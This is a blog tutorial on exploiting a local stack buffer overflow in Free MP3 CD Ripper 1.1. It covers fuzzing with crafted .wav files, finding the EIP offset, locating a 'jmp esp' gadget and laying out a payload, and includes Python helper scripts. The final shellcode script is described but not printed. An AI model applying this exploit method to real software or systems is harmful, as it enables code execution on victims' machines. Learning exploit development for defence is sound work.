Since I am still getting deeper into penetration testing in AppSec, it helps quite a lot to write about things to get new ideas and thoughts, so I decided to write a little tutorial on how a buffer overflow basically works, using a real-world example. A local buffer overflow has been posted over at Exploit-DB, which I will recreate in a slightly different way: “Free MP3 CD Ripper 1.1 Local Buffer Overflow” (http://www.exploit-db.com/exploits/17727). I will improve my exploit in further articles, so do not panic about the unreliable approach at the moment ;-). This vulnerability is quite easy to understand and therefore a nice target for learning how things work. I am not yet familiar with shellcoding at all, so for now I decided to use and inject a shellcode made by the Metasploit Framework team. By the way, I assume you have some basic knowledge of the x86 architecture, of debugging with your favorite debugger (I like IDA :-) ), and at least some knowledge of Python. Python is not strictly needed, as you can write your scripts in any other language too, but it’s a nice and quick scripting language.
So let’s get to work!
The application is vulnerable to a local buffer overflow, which means that malformed local input can lead to exploitation and therefore misbehavior of the application. With the right shellcode, and if the application is run by an administrator, it can also lead to a system compromise.
Let’s fire up the application and see how it behaves if you feed it a random .wav file. A small Python script simply creates a .wav file containing 2500 A’s (by the way, this method of penetration testing in AppSec is also called “fuzzing”):
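A minimal sketch of such a script, assuming Python 3. The file name `crash.wav` and the function names are placeholders of mine, not something taken from the original exploit:

```python
# Hypothetical fuzzing helper: produce a "wav" file that is nothing but A's.
# There is deliberately no valid .wav header in it.

def make_junk(count):
    """Return `count` bytes of 0x41 ("A")."""
    return b"\x41" * count


def write_file(path, data):
    """Write the raw bytes to disk in binary mode."""
    with open(path, "wb") as handle:
        handle.write(data)


if __name__ == "__main__":
    junk = make_junk(2500)  # raise this number for later test runs
    write_file("crash.wav", junk)
    print("wrote %d bytes to crash.wav" % len(junk))
```

Keeping the count in one place makes it easy to rerun the test with a bigger file.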
Open the file using the Convert-Wizard and see what happens….
Surprise? Nothing?! Uhm! That’s crazy: why does nothing happen even though we do not have a correct .wav header and only a bunch of A’s (“\x41”, have a look at www.asciitable.com)? Easy to say: the buffer of the application is big enough to handle 2500 A’s! OK, next logical step: let’s create a .wav that’s larger than 2500 A’s. Use the script above and increase the number of A’s to 5000. Open up the target again and use the wizard to convert our bad .wav file.
Ahh, now it’s working. The application dies silently and without an error message. Looks like we have crashed the application using 5000 A’s.
Now let’s have a deeper look at this bug. Start the application again, launch your favorite debugger (in my example the powerful IDA) and attach it to the running process of the application:
…and open our .wav file again. It crashes again, but now the debugger jumps in:
The interesting thing you notice here is the error message saying that the instruction at “0x41414141” referenced memory which cannot be read. If you have a look at our small Python script again, it looks like the application tries to execute something at an address taken from our malicious .wav file, which only consists of “\x41” bytes. Interesting so far. (You can of course try this using other characters too: put some “\x42” in and see how the message changes.) Have a look at the registers during the crash:
What you can see here is that some of our registers have been overwritten by our malicious .wav file, including the most important one: EIP, aka the instruction pointer. The application crashes here because we overwrote EIP with our junk, and “41414141” is not a valid address. That’s the reason why the application is being interrupted by the debugger. If you have a look down at the Stack view, you see that enormous parts of the stack, including the values that end up in registers like EBX and EIP, have been overwritten. Good for us, bad for the application and the security of the user opening the malicious .wav file. Having control over some of the registers, especially EIP, is an enormous benefit, because you can simply point EIP somewhere else!
The next step is to find out at exactly which position we have overwritten EIP. There are basically two ways. The most unreliable: you can try to overwrite the whole memory space using your desired EIP, but you cannot tell whether you exactly “hit” the position of EIP, and besides this it looks bad. The other, more practicable way is to use a nice Ruby script in the Metasploit Framework called “pattern_create.rb”, which creates unique patterns to use for such kinds of attacks:
Just enter your desired amount of junk as an argument to the script and it prints a unique pattern. As we know that our application crashes somewhere between 2500 and 5000 A’s, we have to take the max value, 5000, here.
Just modify the Python script as shown below:
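If you would rather not paste 5000 characters into your script, the pattern can also be generated directly in Python. The following is a sketch that mimics the well-known “Aa0Aa1Aa2…” layout (upper-case letter, lower-case letter, digit). It is my own re-implementation, not the Metasploit code, and the file name `pattern.wav` is a placeholder:

```python
import itertools
import string

# The Aa0..Zz9 scheme yields 26 * 26 * 10 triples of 3 characters each.
MAX_LENGTH = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern Aa0Aa1Aa2..."""
    if not 0 <= length <= MAX_LENGTH:
        raise ValueError("length must be between 0 and %d" % MAX_LENGTH)
    triples = itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    )
    # Take just enough triples to cover the requested length, then trim.
    needed = itertools.islice(triples, (length + 2) // 3)
    text = "".join(upper + lower + digit for upper, lower, digit in needed)
    return text[:length].encode("ascii")


if __name__ == "__main__":
    with open("pattern.wav", "wb") as handle:
        handle.write(pattern_create(5000))
```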
Now we’ve got a malicious .wav file with a lot of different characters, which helps us to find the exact location of EIP. Use our application to open the new .wav file, and you’ll see the application crash again:
But this time with a different message! And that’s our unique pattern! You can also have a look at the detailed stack view, where you can find the new EIP too. Now we’re going to use another nice script, provided (again) by the Metasploit Framework, called “pattern_offset.rb”. Simply enter the memory reference as argument #1 and our pattern length as argument #2:
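What such an offset lookup does can be sketched in a few lines of Python. This is again my own approximation and not the Metasploit implementation. Because I do not repeat the real crash value here, the example simulates a crash by taking the 4 pattern bytes at a known position and pretending they landed in EIP:

```python
import itertools
import string
import struct


def cyclic_pattern(length):
    """Return `length` bytes of the Aa0Aa1Aa2... pattern (at most 20280 bytes)."""
    triples = itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    )
    needed = itertools.islice(triples, (length + 2) // 3)
    text = "".join(upper + lower + digit for upper, lower, digit in needed)
    return text[:length].encode("ascii")


def pattern_offset(eip_value, length):
    """Return the offset of the 4 bytes found in EIP, or -1 if they are absent."""
    # EIP holds the 4 file bytes interpreted as a little-endian dword,
    # so pack the value back into the byte order used inside the file.
    needle = struct.pack("<I", eip_value)
    return cyclic_pattern(length).find(needle)


if __name__ == "__main__":
    pattern = cyclic_pattern(5000)
    simulated_eip = struct.unpack("<I", pattern[4112:4116])[0]
    print(pattern_offset(simulated_eip, 5000))  # prints 4112
```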
Great output! This means our malicious .wav file overwrites EIP with the 4 bytes that directly follow the first 4112 bytes of the .wav file. Now we can modify our Python script again to verify that this output is correct:
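A sketch of what this verification script could look like, assuming Python 3; the file name `verify.wav` and the function name are placeholders:

```python
OFFSET = 4112  # offset reported by pattern_offset.rb in the text above


def build_offset_check(offset=OFFSET):
    """Return `offset` A's followed by 4 B's that should end up in EIP."""
    junk = b"\x41" * offset
    eip = b"\x42" * 4
    return junk + eip


if __name__ == "__main__":
    with open("verify.wav", "wb") as handle:
        handle.write(build_offset_check())
```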
This script first puts in 4112 A’s, followed by our 4-byte EIP represented by some B’s (“\x42”). Open the new .wav, and you’ll get a new warning from IDA:
This means the provided offset is correct. Now we have exact knowledge of and control over EIP, which gets overwritten after exactly 4112 A’s :-) If you have a closer look at the Stack view in IDA, you’ll see that we’re right!
Next step: we have to find a suitable place to inject our code. Add some pseudo shellcode after the junk and our EIP, like:
Open the .wav and have a look at the IDA Stack view:
Here you can first see our bunch of “\x41” junk, followed by our potential EIP overwritten by “\x42”, and followed by our pseudo shellcode in little-endian notation, which basically means that the bytes of each 4-byte word are shown in reversed order in the stack view.
Now we just have to put our shellcode in and jump to the current ESP. This can be done with the commonly used “jmp esp” instruction, which is, translated to opcode language, “FF E4”.
So all we have to do is find an existing “FF E4” within the loaded application that we can point our EIP to. Take a look at the output window of IDA:
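To see why the bytes look reversed, here is a small sketch that formats raw bytes the way a dword-oriented stack view typically displays them. The function name is my own and has nothing to do with IDA itself:

```python
import struct


def dwords_as_stack_view(data):
    """Format each complete 4-byte group as a little-endian dword in hex."""
    usable = len(data) - len(data) % 4  # ignore an incomplete trailing group
    return [
        "%08X" % struct.unpack_from("<I", data, index)[0]
        for index in range(0, usable, 4)
    ]


if __name__ == "__main__":
    # "ABCD" is stored as 41 42 43 44 but reads as 44434241 when shown as a dword.
    print(dwords_as_stack_view(b"ABCDEFGH"))  # ['44434241', '48474645']
```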
That’s a list of already loaded .dlls where we can search for an “FF E4”. The first column shows where exactly the .dll file gets loaded into memory. As you can see, you basically have two types of loaded .dlls here: system .dlls like msctf.dll, whose code you will find starting at “746A0000”, and application .dlls like “C:\Programme\Free MP3 CD Ripper\libsamplerate.dll”. The most important difference between a “jmp esp” in a system .dll and one in an application .dll is version and availability. You cannot be sure that you’ll have exactly the same version of a loaded system .dll on every Windows system like XP, 2003 or 7. It’s entirely possible that the version, and hence the position of our “jmp esp”, is different and the exploit won’t work. So the most reliable way is to use a reference within an application .dll, because those ship with the application and stay the same for a given version of it.
But at this point I’ll take a “jmp esp” from one of the Windows .dlls, because there is no reliable “jmp esp” in the loaded application .dlls (all of their “jmp esp”s have a null byte in their address):
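The idea behind such a search, including the null-byte check, can be sketched in Python. This assumes you already have the bytes of a module as they are mapped in memory, plus its load address; both the function name and the sample values below are hypothetical:

```python
JMP_ESP = b"\xff\xe4"  # opcode bytes for "jmp esp"


def find_jmp_esp(image, base_address):
    """Return (address, has_null_byte) for every FF E4 found in `image`.

    `image` is assumed to hold the module bytes as mapped in memory, so that
    base_address + position is the address of each hit.
    """
    results = []
    position = image.find(JMP_ESP)
    while position != -1:
        address = base_address + position
        has_null = b"\x00" in address.to_bytes(4, "little")
        results.append((address, has_null))
        position = image.find(JMP_ESP, position + 1)
    return results


if __name__ == "__main__":
    sample = b"\x90\xff\xe4\x90\x90\xff\xe4"  # made-up bytes, not a real .dll
    for address, has_null in find_jmp_esp(sample, 0x00400000):
        print("%08X null byte in address: %s" % (address, has_null))
```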
The problem is that you need a reliable location with regard to the little-endian notation, which means you have to be careful with addresses that contain null bytes. You had better avoid them completely, because the null byte represents a string terminator, which could make an otherwise nice address useless. One exception: if the first (most significant) byte of the address is a null, the address itself still survives, because packing it as little endian moves the null byte to the end of the address; anything placed after the address would then be cut off by the terminator, though. So let’s take the highlighted address and convert it to little endian using the pack function in Python:
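A minimal sketch of the packing step with `struct.pack`. The addresses used here are made-up placeholders, not the highlighted address from the debugger:

```python
import struct


def pack_address(address):
    """Pack a 32-bit address into 4 bytes, least significant byte first."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    # Placeholder address without null bytes: the byte order is simply reversed.
    print(pack_address(0x11223344).hex())  # 44332211
    # Placeholder address with a leading null: the null becomes the last byte.
    print(pack_address(0x00401234).hex())  # 34124000
```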
Let’s put in one breakpoint “\xcc”, some NOPs “\x90” and a pseudo shellcode to make the stack view a bit clearer and to see whether ESP points to exactly the position after our EIP. Attach your debugger to the running application and convert the malicious .wav file. Have a look at the Stack view:
Here you can clearly see that EIP has been successfully overwritten with our borrowed address from WMVCore.dll, followed by the breakpoint and the NOPs, and after that the bytes “\x41\x42\x43\x44\x45”, which represent the pseudo shellcode. ESP starts at “0x1BFFEE8”, which is not directly after the EIP, so we have to fill the gap with 3 further NOPs (excluding the “\xcc”) after the EIP.
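The layout of this test file can be sketched as a small helper. The return address `0x11223344` is a placeholder and not the WMVCore.dll address, and the tail is just the harmless pseudo shellcode “ABCDE”; the function and parameter names are my own:

```python
import struct


def build_layout(offset, return_address, nop_count, tail, breakpoint=False):
    """Assemble junk + packed EIP + optional 0xCC + NOPs + trailing bytes."""
    junk = b"\x41" * offset
    eip = struct.pack("<I", return_address)  # little-endian return address
    trap = b"\xcc" if breakpoint else b""    # int3, makes the debugger stop
    nops = b"\x90" * nop_count               # padding up to where ESP points
    return junk + eip + trap + nops + tail


if __name__ == "__main__":
    pseudo_shellcode = b"\x41\x42\x43\x44\x45"
    layout = build_layout(4112, 0x11223344, 3, pseudo_shellcode)
    print(len(layout))  # 4124
```

Keeping the NOP count as a parameter makes it easy to adjust the padding until ESP lines up with the start of the trailing bytes.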
Now we have to put in some real shellcode. Let’s take one from the Metasploit Framework again, which simply launches calc.exe:
Using this shellcode we can finalize our Python script:
Now launch the application again, load our malicious .wav file, et voilà: it still closes itself, but then launches the famous calc.exe :-)
Great! We’ve just exploited a vulnerability.
There are a few other ways of exploiting this vulnerability. So expect to read more about exploiting soon :-)